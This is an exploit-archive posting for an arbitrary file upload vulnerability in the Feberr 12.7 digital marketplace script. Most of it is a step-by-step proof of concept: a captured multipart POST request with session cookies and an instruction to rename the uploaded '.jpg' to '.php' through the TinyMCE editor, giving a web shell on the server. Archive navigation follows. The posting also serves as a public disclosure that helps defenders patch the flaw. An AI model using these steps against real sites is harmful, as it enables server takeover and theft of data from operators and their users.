Feberr 12.7 Shell Upload

Feberr 12.7 Shell Upload: Posted Feb 3, 2022; Authored by Sohel Yousef; Feberr version 12.7 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 80a3a733c304a0245ddc2f31c3be27f6a13c34af5ee5bbb41dffb275753993ff; Download | Favorite | View

Feberr 12.7 Shell Upload

# Exploit Title: Feberr - Multivendor Digital Products Marketplace arbitrary file upload
# Version  12.7
# Google Dork: N/A
# Date: 24/01/2022
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace
# Software link 2 :https://www.codecanor.com/product/feberr-multivendor-digital-products-marketplace/
# Software Demo : https://overtasks.com/demo/feberr
# Category: webapps

Feberr - Multivendor Digital Products Marketplace contain arbitrary file upload
registered vendor can upload .php files in edit-item section using tinymce with use of intercept tool in burbsuite to edit the raw

details 

after register as vendor on the system go and edit or add an item in the section of detailes there tinymce
direct link :
https://localhost/feberr/edit-item/



POST /demo/feberr/upload HTTP/1.1
Host: localhost 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------429310566417994448462725662126
Content-Length: 179156
Origin: https://overtasks.com
Connection: close
Referer: https://localhost /demo/feberr/edit-item/PFRLZAmzwdWFNWnlgxUaxbLIO
Cookie: XSRF-TOKEN=eyJpdiI6InNxSGJaQjZ0UDYzamhnT2lXL09FWmc9PSIsInZhbHVlIjoiOEZCSVBnL3orczdpc2p4RE40ZmhlWCtKck1UNURET2EwWTdyeEtDVUR0Q1pMa2RLSXphSjNTbWJnRVlNS3Jld1U2d1lucWRNMDg1RVUybWdXTlMzMDAzUHcrdjNiM0IyWXRDbk01dzJJZU0zK3ZOWFlVM2JkTFRTZzdMMGhmN1UiLCJtYWMiOiIzYzU2ZTFkNThjZGQ5ZTI0ZWNiNzUzNWEyM2E4ZTk0OTZlZWYzMDc2NDAxOWU5NjZhNjkzNzQ5ZTIzMTA2NGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNKa1RRUHgvVStWYy85MkNuVFI2RlE9PSIsInZhbHVlIjoiUk8vMWMrS0NNLzczUWdSdFBnck1sSmdzVUhkckdQYUtORlczSGFDNWRJN1MvbGx0VGFNUkVCTS9jb1I3L25PbkdBc29hODltMXVTTVlxQVlIQ1FSaWtmVWwzWkNYVUlOQUk2Q04zbmwxdzRSQXdiRTF4WVhTTy9IaWp0V2dwM0UiLCJtYWMiOiIzMDY1ODI4ODkwZTczNjJkNjZhYmE3YjJiZWFiNzA0ODNhNTdmY2RkYjFhMmFlODQ3MTg1OTAyMDFiNWM1NjMwIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------429310566417994448462725662126
Content-Disposition: form-data; name="file"; filename="blobid1643057738041.jpg" >>>>>>>>>>>>>>> CHANGE THIS TO .php
Content-Type: image/jpeg


you will have the direct link to your uploaded file using tinymce editor

Top Authors In Last 30 Days

Red Hat 201 files
indoushka 127 files
Ubuntu 91 files
Gentoo 33 files
Debian 26 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,109)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,895)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,615)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,780)
UNIX (9,441)
UnixWare (187)
Windows (6,676)
Other

Feberr 12.7 Shell Upload

Feberr 12.7 Shell Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Feberr 12.7 Shell Upload

Share This

Feberr 12.7 Shell Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems